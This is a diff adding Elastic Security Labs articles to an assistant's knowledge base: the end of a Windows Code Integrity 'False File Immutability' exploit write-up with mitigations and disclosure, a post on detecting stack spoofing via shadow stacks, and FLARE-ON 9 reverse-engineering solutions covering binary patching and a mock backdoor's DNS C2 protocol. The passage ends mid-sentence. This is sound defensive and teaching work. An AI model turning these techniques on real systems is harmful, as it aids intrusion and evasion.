+FineButWeCanStillEasilyStopIt has to jump through some hoops to correctly identify the problematic behavior while minimizing false positives. Ideally, CI itself could be fixed with a few small changes. Let’s look at what that would take.
+
+![Fixing catalog processing by copying the catalog to the heap](/assets/images/false-file-immutability/image13.png)
+
+As mentioned above in the Affected Operations section, applications can mitigate double-read vulnerabilities by copying the file contents out of the file mapping into the heap, and exclusively using that heap copy for all subsequent operations. The kernel heap is called the [pool](https://learn.microsoft.com/en-us/windows/win32/memory/memory-pools), and the corresponding allocation function is **ExAllocatePool**.
+
+![Fixing catalog processing by locking the pages into RAM](/assets/images/false-file-immutability/image15.png)
+
+An alternative mitigation strategy to break these types of exploits is to pin the pages of the file mapping into physical memory using an API such as **MmProbeAndLockPages**. This prevents eviction of those pages when the attacker empties the working set.
+
+
+## End-user detection and mitigation
+
+Fortunately, there is a way for end-users to mitigate this exploit without changes from Microsoft – Hypervisor Protected Code Integrity (HVCI). If HVCI is enabled, CI.dll doesn’t do catalog parsing at all. Instead, it sends the catalog contents to the Secure Kernel, which runs in a separate virtual machine on the same host. The Secure Kernel stores the received catalog contents in its own heap, from which signature validation and parsing are performed. Just like with the **ExAllocatePool** mitigation described above, the exploit is mitigated because file changes have no effect on the heap copy.
+
+The probabilistic nature of this attack means that there are likely many failed attempts. Windows records these failures in the **Microsoft-Windows-CodeIntegrity/Operational** event log. Users can check this log for evidence of exploitation.
+
+![**Microsoft-Windows-CodeIntegrity/Operational** event log showing an invalid driver signature](/assets/images/false-file-immutability/image23.png)
+
+![**Microsoft-Windows-CodeIntegrity/Operational** event log showing an invalid security catalog](/assets/images/false-file-immutability/image4.png)
+
+
+# Disclosure
+
+The disclosure timeline is as follows:
+ - 2024-02-14: We reported ItsNotASecurityBoundary and FineButWeCanStillEasilyStopIt to MSRC as VULN-119340, suggesting **ExAllocatePool** and **MmProbeAndLockPages** as simple low-risk fixes
+ - 2024-02-29: The Windows Defender team reached out to coordinate disclosure
+ - 2024-04-23: Microsoft releases [KB5036980](https://support.microsoft.com/en-us/topic/april-23-2024-kb5036980-os-builds-22621-3527-and-22631-3527-preview-5a0d6c49-e42e-4eb4-8541-33a7139281ed) Preview with the **MmProbeAndLockPages** fix
+ - 2024-05-14: Fix reaches GA for Windows 11 23H2 as [KB5037771](https://support.microsoft.com/en-us/topic/may-14-2024-kb5037771-os-builds-22621-3593-and-22631-3593-e633ff2f-a021-4abb-bd2e-7f3687f166fe); we have not tested any other platforms (Win10, Server, etc).
+ - 2024-06-14: MSRC closed the case, stating "We have completed our investigation and determined that the case doesn't meet our bar for servicing at this time. As a result, we have opened a next-version candidate bug for the issue, and it will be evaluated for upcoming releases. Thanks, again, for sharing this report with us."
+
+
+# Fixing Code Integrity
+
+Looking at the original implementation of **CI!I_MapAndSizeDataFile**, we can see the legacy code calling **ZwCreateSection** and **ZwMapViewOfSection**:
+
+![The vulnerable **CI!I_MapAndSizeDataFile** implementation](/assets/images/false-file-immutability/image22.png)
+
+Contrast that with the new **CI!CipMapAndSizeDataFileWithMDL**, which follows that up with **MmProbeAndLockPages**:
+
+![The new **CI!CipMapAndSizeDataFileWithMDL** has a mitigation](/assets/images/false-file-immutability/image3.png)
+
+
+# Summary and conclusion
+
+Today we discussed and named a bug class: **False File Immutability**. We are aware of two public exploits that leverage it, PPLFault and ItsNotASecurityBoundary.
+
+[PPLFault](https://github.com/gabriellandau/PPLFault): Admin -> PPL [-> Kernel via GodFault]
+ - Exploits bad immutability assumptions about image section in CI/MM
+ - Reported September 2022
+ - Patched February 2024 (~510 days later)
+
+[ItsNotASecurityBoundary](https://github.com/gabriellandau/ItsNotASecurityBoundary): Admin -> Kernel
+ - Exploits bad immutability assumptions about data sections in CI
+ - Reported February 2024
+ - Patched May 2024 (~90 days later)
+
+If you are writing Windows code that operates on files, you need to be aware of the fact these files may be modified while you are working on them, even if you deny write sharing. See the Affected Operations section above for guidance on how to protect yourselves and your customers against these types of attacks.
+
+ItsNotASecurityBoundary is not the end of FFI. There are other exploitable FFI vulnerabilities out there. My colleagues and I at Elastic Security Labs will continue exploring and reporting on FFI and beyond. We encourage you to follow along on X [@GabrielLandau](https://x.com/GabrielLandau) and [@ElasticSecLabs](https://x.com/elasticseclabs).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/finding_truth_in_the_shadows.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/finding_truth_in_the_shadows.md
new file mode 100644
index 0000000000000..32ea2d7ca2303
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/finding_truth_in_the_shadows.md
@@ -0,0 +1,63 @@
+---
+title: "Finding Truth in the Shadows"
+slug: "finding-truth-in-the-shadows"
+date: "2023-01-26"
+description: "Let's discuss three benefits that Hardware Stack Protections brings beyond the intended exploit mitigation capability, and explain some limitations."
+author:
+  - slug: gabriel-landau
+image: "blog-thumb-laser-tunnel.jpg"
+category:
+  - slug: security-research
+---
+
+Microsoft has begun rolling out user-mode [Hardware Stack Protection](https://techcommunity.microsoft.com/t5/windows-kernel-internals-blog/understanding-hardware-enforced-stack-protection/ba-p/1247815) (HSP) starting in Windows 10 20H1. HSP is an exploit mitigation technology that prevents corruption of return addresses on the stack, a common component of [code reuse attacks](https://en.wikipedia.org/wiki/Return-oriented_programming) for software exploitation. Backed by silicon, HSP uses Intel's Control flow Enforcement Technology (CET) and AMD's Shadow Stack, combined with software support [described in great detail](https://windows-internals.com/cet-on-windows/) by Yarden Shafir and Alex Ionescu. Note that the terms HSP and CET are often used interchangeably.
+
+HSP creates a shadow stack, separate from the regular stack. It is read-only in user mode, and consists exclusively of return addresses. Contrast this with the regular stack, which interleaves data with return addresses, and must be writable for applications to function correctly. Whenever a CALL instruction executes, the current instruction pointer (aka return address) is pushed onto both the regular and shadow stacks. Conversely, RET instructions pop the return address from both stacks, generating an exception if they mismatch. In theory, ROP attacks are mitigated because attackers can't write arbitrary values to the read-only shadow stack, and changing the Shadow Stack Pointer (SSP) is a privileged operation, making pivots impossible.
+
+Today we’re going to discuss three additional benefits that HSP brings, beyond the intended exploit mitigation capability, then go into some limitations.
+
+# Debugging
+
+Although designed as an exploit mitigation, HSP provides useful data for other purposes. Modern versions of [WinDbg](https://apps.microsoft.com/store/detail/windbg-preview/9PGJGD53TN86?hl=en-us&gl=us) will display a hint to the user that they can use SSP as an alternate way to recover a stack trace. This can be very useful when debugging stack corruption bugs that overwrite return addresses, because the shadow stack is independent. It's also useful in situations where the stack unwind data is unavailable.
+
+For example, see the WinDbg output below for a process memory dump. The `k` command displays a regular stack trace. `dps @ssp` resolves all symbols it can find, starting at SSP - this is essentially a shadow stack trace. Note how the two stack traces are identical except for the first frame:
+
+![Note the similarities](/assets/images/finding-truth-in-the-shadows/image3.png)
+
+# Performance
+
+Kernel mode components such as EDR and ETW often capture stack traces to provide additional context to each event. On x64 platforms, a stack walk entails capturing the thread’s context, then looking up a data structure for each frame that enables the walker to "unwind" it and find the next frame. These lookups were slow enough that Microsoft saw fit to construct a [multi-tier cache system](http://uninformed.org/index.cgi?v=8&a=2&p=20) when they added x64 support. You can see the traverse/unwind process approximated [here](https://github.com/reactos/reactos/blob/11a71418d50f48ff0e10d2dbbe243afaf34c4368/sdk/lib/rtl/amd64/unwind.c#L909C6-L1011) in ReactOS, sans cache.
+
+Given that the entire shadow stack likely resides on a single page and no unwinding is required, shadow stack walking is probably more performant than traditional stack walking, though this has yet to be proven.
+
+# Detection
+
+The shadow stack provides an interesting detection opportunity. Adversaries can use techniques demonstrated in [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer/tree/master) and [CallStackSpoofer](https://github.com/WithSecureLabs/CallStackSpoofer) to obfuscate their presence against thread stack scans (e.g. `StackWalk64`) and inline stack traces like [Sysmon Open Process events](https://www.lares.com/blog/hunting-in-the-sysmon-call-trace/).
+
+By comparing a traditional stack walk against its shadowy sibling, we can both detect and bypass thread stack spoofing. We present [ShadowStackWalk](https://github.com/gabriellandau/ShadowStackWalk), a PoC that implements CaptureStackBackTrace/StackWalk64 using the shadow stack to catch thread stack spoofing.
+
+When the stack is normal, ShadowStackWalk functions similarly to `CaptureStackBackTrace` and `StackWalk64`:
+
+![ShadowStackWalk normal stack](/assets/images/finding-truth-in-the-shadows/image7.jpg)
+
+ShadowStackWalk is unaffected by intentional breaks of the call stack such as [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer/blob/f67caea38a7acdb526eae3aac7c451a08edef6a9/ThreadStackSpoofer/main.cpp#L20-L25). Frames missed by other techniques are in green:
+
+![ShadowStackWalk encounters a broken call stack](/assets/images/finding-truth-in-the-shadows/image8.jpg)
+
+ShadowStackWalk doesn't care about forged stack frames. Incorrect frames are in red. Frames missed by other techniques are in green:
+
+![Forged stack frames? No Problem.](/assets/images/finding-truth-in-the-shadows/image9.jpg)
+
+# Limitations
+
+Hardware support for HSP is limited. HSP requires at least an 11th-gen Intel or 5000-series Ryzen CPU, both released in late 2020. There is no software emulation. It will take years for the majority of CPUs to support HSP.
+
+Software support for HSP is limited. Microsoft has been slowly rolling it out, even among their own processes. On an example Windows 10 22H2 workstation, it's enabled in roughly 40% of processes. Because HSP is an exploit mitigation, implementation will likely start with common exploitation targets like web browsers, though not all msedge.exe processes shown below are not protected by it. As HSP matures and support improves, non-HSP processes will become outliers worthy of additional scrutiny, similar to processes in 2023 without DEP support. For now, malware can simply choose processes without HSP enabled. Also of note is that HSP does not support WOW64 at all.
+
+![Software support for HSP is limited, even among Microsoft's processes (in red). Contrasted (in blue) against mature technologies like DEP and ASLR](/assets/images/finding-truth-in-the-shadows/image2.jpg)
+
+HSP was designed with an exploit mitigation threat model. It was never designed to defend against adversaries who have code execution, can change thread contexts, and perform system calls. In time, adversaries will adapt their call stack manipulations to manipulate the shadow stack as well. However, the fact that the shadow stack is user-RO and changing the SSP is privileged operation means that such tampering requires system calls which can (theoretically) be subjected to far more scrutiny than traditional stack tampering.
+
+# Conclusion
+
+Today we discussed three potential benefits of Windows Hardware Stack Protection, and released [a PoC](https://github.com/gabriellandau/ShadowStackWalk) demonstrating how it can be used to both detect and defeat defense evasions that manipulate the call stack.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/flare_on_9_solutions_burning_down_the_house.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/flare_on_9_solutions_burning_down_the_house.md
new file mode 100644
index 0000000000000..d86f2d28d5e0f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/flare_on_9_solutions_burning_down_the_house.md
@@ -0,0 +1,553 @@
+---
+title: "FLARE-ON 9 Solutions:"
+slug: "flare-on-9-solutions-burning-down-the-house"
+date: "2023-01-04"
+subtitle: "Burning down the house"
+description: "This year's FLARE-ON consisted of 11 different reverse engineering challenges with a range of interesting binaries. We really enjoyed working on these challenges and have published our solutions here to Elastic Security Labs."
+author:
+  - slug: daniel-stepanic
+  - slug: cyril-francois
+  - slug: salim-bitam
+  - slug: remco-sprooten
+image: "illustration-endpoint-security-stop-malware-1284x926.jpg"
+category:
+tags:
+  - malware analysis
+  - reverse-engineering
+---
+
+## Introduction
+
+To celebrate cybersecurity month, the Malware Analysis and Reverse Engineering Team (MARE) enjoyed participating in the Mandiant [FLARE-ON Challenge](https://www.mandiant.com/resources/blog/announcing-ninth-flareon-challenge). FLARE-ON is an excellent event for participants of all backgrounds and experience levels who want to learn more about malware analysis. This year consisted of 11 different reverse engineering challenges with a range of interesting binaries. We really enjoyed working on these challenges and have published our solutions here to Elastic Security Labs.
+
+### Challenge 1 - “Flaredle”
+
+> Welcome to FLARE-ON 9! You probably won't win. Maybe you're like us and spent the year playing Wordle. We made our own version that is too hard to beat without cheating. Play it live at: [http://flare-on.com/flaredle/](http://flare-on.com/flaredle/)
+
+#### Solution
+
+After downloading and unpacking the file, we see 4 file objects. ![](/assets/images/flare-on-9-solutions-burning-down-the-house/image9.jpg)
+
+The index.html file and accompanying js files give away what we are talking about is a HTML/JavaScript challenge. Opening the file script.js confirms our suspicion. In the first few lines of code the answer to the challenge is clear to the trained eye. Let’s explain.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image72.jpg)
+
+On line 9 the value of **rightGuessString** translates to WORDS[57]. Even if you don't know javascript, the variables and iterative loop suggest an evaluation of the user-supplied guess (rightGuessString) and a hard-coded value. If we look at the contents of words.js, we see the correct value on the 58th line (javascript arrays begin with 0 but the file start at line 1): "flareonisallaboutcats".
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image97.jpg)
+
+By visiting the online game and submitting this string, we can validate the correct flag for challenge one!
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image27.jpg)
+
+**Flag:** [flareonisallaboutcats@flare-on.com](mailto:flareonisallaboutcats@flare-on.com)
+
+## Challenge 2 - “Pixel Poker”
+
+> I said you wouldn't win that last one. I lied. The last challenge was basically a captcha. Now the real work begins. Shall we play another game?
+
+### Solution
+
+This challenge consists of a 32-bit Windows application that has been sweeping the nation, called Pixel Poker! Users get 10 attempts to click on the correct pixel from the window before the program terminates.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image8.jpg)
+
+The error message after 10 failed attempts provided a reliable lead to follow, and we focused on where that click restriction was implemented. We converted that decimal value of 10 into hexadecimal (0xA) and kicked off an immediate value search.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image88.jpg)
+
+The first result from our search is listed with instructions: **cmp eax, 10**. You might not be fluent in assembly, but “cmp” is a mathematical instruction to compare the contents of “eax” with the number ten. At first glance, that looks like the kind of logic behind that click restriction.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image98.jpg)
+
+By viewing the decompiled code, we can confirm this is our intended target instruction with the error message we saw on prior screenshot after the 10 attempts. We’re one step closer to knowing where to click in the window.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image78.jpg)
+
+In order to locate the validation logic and those coordinates, we look at code in close proximity to the previous error message. We observe two instances where the EAX register is populated using strings (“FLAR”) and (“E-On”) that then get divided with hardcoded values and compared with our clicked pixel values.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image12.jpg)
+
+After these straightforward operations, we derive two coordinates (95, 313). If you are up for a challenge and haven’t had too much coffee, go on and click that pixel.
+
+The flag can also be attained by leveraging a debugger and enabling the zero-flag (ZF) on two JNZ (jump-if-not-zero) instructions that appear directly after the previously-mentioned compare checks. This method allows us to bypass manually clicking the correct pixel location.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image68.jpg)
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image64.jpg)
+
+For fun, we wrote a small program to patch out the click restriction and brute force clicking all available pixels using the SendMessage API.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image4.jpg)
+
+Two minutes and about 100,000 clicks later, the flag was released to us.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image55.jpg)
+
+\*_Flag: \*\_w1nN3r_W!NneR_[cHick3n_d1nNer@flare-on.com](mailto:cHick3n_d1nNer@flare-on.com)
+
+## Challenge 3 - “Magic 8 Ball”
+
+> You got a question? Ask the 8 ball!
+
+### Solution
+
+This challenge appeared to be an interactive 8-ball game developed with an open source SDL [library](https://www.libsdl.org/). Based on quick observations, there are two obvious inputs moving the 8-ball directionally (left, up, down, right) and an input box with a maximum of 75 characters.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image75.jpg)
+
+The first starting point was tracing the string “Press arrow keys to shake the ball” that was displayed in the application. The decompiled view of the function containing this string showed another string directly above it was being copied (“gimme flag pls?”).
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image82.jpg)
+
+Our next pivot was reviewing the code calling this function for more context. After the software executes and the game is displayed, a “do while” loop polls for input.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image87.jpg)
+
+One function we reviewed stood out, one containing multiple “if then” conditional statements based on single character values.
+
+Our malware analysts begin their careers in childhood, diligently playing video games for literally hours at a time– to them this pattern resembles the [Konami](https://en.wikipedia.org/wiki/Konami_Code) code, by which players enabled undocumented features after entering a series of inputs (left, left, up, right, up, left, down, up, left).
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image30.jpg)
+
+By moving the 8-ball first in this order of operations and then entering the previously-recovered string (“gimme flag pls?”), we unlocked the flag.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image85.jpg)
+
+**Flag:** U*cRackeD_th1$\_maG1cBaLL*!! [\_@flare-on.com](mailto:_@flare-on.com)
+
+## Challenge 4 - “darn_mice”
+
+> "If it crashes it's user error." -Flare Team
+
+### Solution
+
+The fourth challenge was a 32bit PE binary. Executed without any arguments, the binary initially appeared to run briefly before terminating. When run with arguments, though, we see a strange error message.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image2.jpg)
+
+After opening the binary in IDA and tracing that error, we determined that the first argument is being passed to the function sub_401000.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image23.jpg)
+
+In this function we see that our input is added to the values of a constant array, and at line 51 we see that the result is executed as code. This means that our input and the value in the array are resolved as an opcode which is returned. And that means a NOP opcode (0x90) isn’t an option, if you’re following along. The opcode we’re looking for is RET (0xC3): we copied the byte sequences out of IDA and hacked together an evaluation in Python.
+
+```
+arr = [0x50,0x5E,0x5E,0xA3,0x4F,0x5B,0x51,0x5E,0x5E,0x97,0xA3,0x80,0x90,0xA3,0x80,0x90,0xA3,0x80,0x90,0xA3,0x80,0x90,0xA3,0x80,0x90,0xA3,0x80,0x90,0xA3,0x80,0x90,0xA2,0xA3,0x6B,0x7F]"".join([chr(0xC3 - c) for c in arr])
+```
+
+Using the current input we can retrieve the flag.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image60.png)
+
+**Flag:** i*w0uld_l1k3_to_RETurn_this*[joke@flare-on.com](mailto:joke@flare-on.com)
+
+## Challenge 5 - “T8”
+
+> FLARE FACT #823: Studies show that C++ Reversers have fewer friends on average than normal people do. That's why you're here, reversing this, instead of with them, because they don't exist. We’ve found an unknown executable on one of our hosts. The file has been there for a while, but our networking logs only show suspicious traffic on one day. Can you tell us what happened?
+
+### Solution
+
+For this challenge, we’ve been provided with a PCAP in addition to a binary.
+
+#### PCAP file overview
+
+The PCAP contains the communication between the binary and a C2 server (not provided). Having studied thousands of PCAPs, we note an exchange between the binary and C2 server that resembles base64.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image99.jpg)
+
+#### Binary overview
+
+This binary appears to be written in C++ or implement classes in a similar way.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image53.jpg)
+
+If this binary is written in C++, our goal is to find the VTABLE and reconstruct it. The VTABLE in question is located in .rdata at the address 0x0100B918, which means we can stop speculating about this being C++.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image49.jpg)
+
+Renaming the VTABLE functions makes analysis easier and more efficient. We stepped through execution, and a few operations stood out. Following the flow of execution, a pseudorandom string was generated by the function located at 0x0FC1020, using the srand and rand APIs to randomly generate 5 digits. After appending those to the substring FO9, the entire string is MD5-hashed.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image34.jpg)
+
+The string “ahoy” is RC4-encrypted using the MD5 hash as a key, and then the result is base64-encoded and sent to the server using an HTTP POST request. Data sent back from C2 is base64-decoded and then decrypted using the same MD5 hash. To proceed with the challenge, we’ll need to apply our understanding of this configuration.
+
+Our next objective is to bruteforce the random string to derive the RC4 key. To do that, we wrote a script to generate a word list of all the possible values for that string of eight characters which will resemble “FO9\<5DIGITS\>”. We also know that the string “ahoy” is encrypted and encoded by this process, which means we can look for that string in the PCAP by searching for “ydN8BXq16RE=”.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image77.jpg)
+
+Our script tells us the random string (F0911950) and hash (a5c6993299429aa7b900211d4a279848), so we can emulate the C2 server and replay the PCAP to decrypt the data. But, as seen in the screenshot below, just putting a breakpoint after the decrypt_server_data function we can find the flag.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image17.jpg)
+
+**Flag:** i*s33*[you_m00n@flare-on.com](mailto:you_m00n@flare-on.com)
+
+## Challenge 6 - “à la mode”
+
+> FLARE FACT #824: Disregard flare fact #823 if you are a .NET Reverser too. We will now reward your fantastic effort with a small binary challenge. You've earned it kid!
+
+### Solution
+
+This challenge starts off in a hauntingly familiar way: with an incident response chat log and a .NET DLL.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image74.jpg)
+
+The chat log offers a clue that another (missing) component may interact with the DLL.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image46.jpg)
+
+Working with .NET samples often, you’ll be familiar with dnSpy. Right away we spotted a function of the DLL labeled GetFlag and containing client-side code for connecting to a NamedPipe called FlareOn.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image38.jpg)
+
+Given the previous clue, we know there is something more to this DLL. We opened it in IDA and noted some interesting strings, which appear superficially similar.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image91.jpg)
+
+Cross-referencing these strings led us to a simple encryption function used throughout the program with a single-byte XOR (0x17). In this function the library imports are consistent with NamedPipe functionality.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image92.jpg)
+
+After annotating the libraries and reviewing this functionality, it establishes a named pipe and performs validation.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image96.jpg)
+
+This validation function uses a new string encryption function and string comparison (lstrcmpA) when the connection occurs.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image90.jpg)
+
+With this information, we used x64dbg to set this validation function as the origin function and retrieved the decrypted flag.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image45.jpg)
+
+**Flag:** M1x3d*M0dE*[4_l1f3@flare-on.com](mailto:4_l1f3@flare-on.com)
+
+## Challenge 7 - “anode”
+
+> You've made it so far! I can't believe it! And so many people are ahead of you!
+
+### Solution
+
+This challenge is a 55 MB Windows PE file which appears to be a packed Node.js binary. When the binary is executed it asks for a flag and returns a “Try Again” error message.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image40.jpg
+
+Conveniently (but not helpfully), we see it when we search strings.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image70.jpg)
+
+We can better locate it using the HxD hex editor, which reveals it in a larger blob of cleartext code.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image1.jpg)
+
+This blob of code also tells us that the flag is expected to have a length of 44 characters. Sometimes the wrong answer tells you enough to get the right one, though. The attempt generated a new error, though. Readers should note that this attempt was coincidentally made using an unpacked version.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image25.jpg)
+
+That error message appears in the cleartext blog of code we discovered, which helps us locate the responsible logic and get one step closer to the right flag.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image16.jpg)
+
+Curiously, when submitting the same bad flag using the packed binary, the error is different.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image40.jpg
+
+If we comment the condition out to bypass that validation, we get another new error.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image41.jpg)
+
+Something is definitely happening, and while experimenting has revealed a few things we should finish reviewing this cleartext blob of code to understand how the challenge works. It appears as though the flag is submitted and transformed within a state machine that we need to figure out.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image36.jpg)
+
+And the result of that state machine operation is evaluated against the correct flag.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image14.jpg)
+
+But now we have a different (bigger) problem, because it looks like each value is XOR-encrypted with a randomly-generated value supplied by the math.random function. Also we don’t know the sequence of values that produce the expected sequence of operations. But this is functional in the challenge binary, which means there’s a fixed sequence of randoms.
+
+We need to dump those values, and we can do this by patching the script being used by the challenge binary and writing that sequence of values to a file.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image35.jpg)
+
+We also dump the sequence of states using the same method.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image93.jpg)
+
+Now we can patch the binary to output both sequences of values and states, which makes debugging so much easier.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image21.jpg)
+
+We have the elements we need to reverse operations and their order, but we’re feeling lazy so let’s build ourselves a javascript deobfuscator! This will help get rid of that state machine and reverse the encryption to reveal the flag, we’re using the [pyesprima](https://github.com/int3/pyesprima) frontend for Javascript. First, we’ll create a class that inherits the esprima.NodeVisitor class and will be able to visit the JavaScript Abstract Syntax Tree (AST).
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image18.jpg)
+
+Next, we then visit the AST and collect each subtree associated to a switch case node.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image61.jpg)
+
+For each state that was previously extracted, we test the if/else node’s condition and choose the right branch’s inner subtree. Either the predicate is a literal and we directly test its value or the predicate is a Math.random call so we test the next value.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image19.jpg)
+
+Finally, for each expression we determine if it contains a Math.floor(Math.random) call and then replace it with the right random value, then for the current state replace the original subtree with our expression.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image69.jpg)
+
+Pyesprima doesn’t return JavaScript code back from its AST. So we implemented a very small JavaScript code emitter that replaces each node with the proper JavaScript code recursively.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image22.jpg)
+
+But after comparing the deobfuscated script and the packed binary, we still don’t have the same result!
+
+There must be some shenanigans in addition to math.random. We quickly discover by testing that the if(x) and the if(xn), with x being a number, have two strange different behaviors. if(x) always returns false if the number is \> 0 and if(xn) always returns false if the number contains a zero!
+
+So with this in mind, we fixed the predicates in the script before running the deobfuscator again.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image80.jpg)
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image100.jpg)
+
+This looks like our obfuscated script.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image63.jpg)
+
+Let’s reverse this obfuscation.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image37.jpg)
+
+The final inverted script with “target” as the initial flag looks like this:
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image54.jpg)
+
+_Readers interested in the scripts created for FLARE-ON challenges can find them linked at the end of this publication._
+
+Running the script ends up producing an array.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image47.jpg)
+
+**Flag:** n0t*ju5t_A_j4vaSCriP7*[ch4l1eng3@flare-on.com](mailto:ch4l1eng3@flare-on.com)
+
+## Challenge 8 - “Backdoor”
+
+> I'm such a backdoor, decompile me why don't you…
+
+### Solution
+
+This challenge consists of an 11MB Windows PE binary that executes when launched, but returns nothing to the console. We often augment analysis with packet captures, and were listening with WireShark when we observed a DNS resolution event. We’re off to a great start.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image76.jpg)
+
+We notice a convention that may be significant: we have flare_xx functions and their flared_yy counterparts. If we inspect the flare_xx functions, they each contain a “try/catch” structure.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image31.jpg
+
+But when we turned to look at their flared_yy counterparts, something's not quite right.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image33.jpg)
+
+In dnSpy, we trace execution to an InvalidProgramException and don’t reach the flared_yy code. But in spite of that, the challenge seems to execute somewhat successfully.
+
+Beginning with main and analyzing the first function, we have a rough outline of what’s happening: there are two layers of “try/catch” logic doing similar things in different ways, and creating a dynamic method Intermediate Language (IL) somehow provided by parameters.
+
+The first layer, flare_71, constructs a dynamic method with the IL directly passed as parameter:
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image31.jpg
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image95.jpg)
+
+Some behind-the-scenes work happens to patch the IL code using a metadata token that has the dynamic method’s context before SetCode is called. A dictionary of locations and metadata tokens is resolved by calling GetTokenFor in the same context, as well.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image43.jpg)
+
+After patching, the IL is only valid in the context of the dynamic method. To reconstruct the binary properly, now we need to dump the IL before it can be modified, patch it with the right metadatatoken, and then patch the binary to fix the broken function.
+
+We can create a script to do that in Python.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image52.jpg)
+
+After patching the binary’s first layer, it decompiles correctly. The flared_70 function, responsible for running the second obfuscation layer, is a bit more complicated though.
+
+The function will read one of its PE sections by name, using the first 8 characters of the hash of the metadata token and corresponding to the function that raised the InvalidProgramException error. This is decrypted with a hardcoded key. The decrypted section contains the IL of the function to call.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image81.jpg)
+
+The IL patching is somewhat complicated this time and involves a little obfuscation.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image39.jpg)
+
+The next problem is that we don’t have all the hashes beforehand, only when the function gets called. If we put a breakpoint on the resolving function, we can dump each hash.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image94.jpg)
+
+We wrote a script to do the patching automatically and run it each time we add a new hash.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image84.jpg)
+
+At this point most of the functions are deobfuscated and we can move on to the core of the challenge.
+
+Initially we observed a large number of DNS resolution events, but didn’t see the malware attempt a network connection to our Flask server. While debugging the sample, though, we can see what looks like an attempt to process commands.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image50.jpg)
+
+The problem is that we still don’t know how to interact with the backdoor. By backtracking to the source of each command, we can see that this sample is using the IP addresses received from these DNS resolutions for communication. Now we know why we didn’t see this sample try to connect to our Flask server, at least.
+
+How this worked, we were about to learn, is a little complicated.
+
+The first IP address is used to create a file, after which all commands arrive in the form of a “255.x.y.z” network address. Each IP address returned to the sample is parsed for its octets, but it might be easier to understand with a concrete example:
+
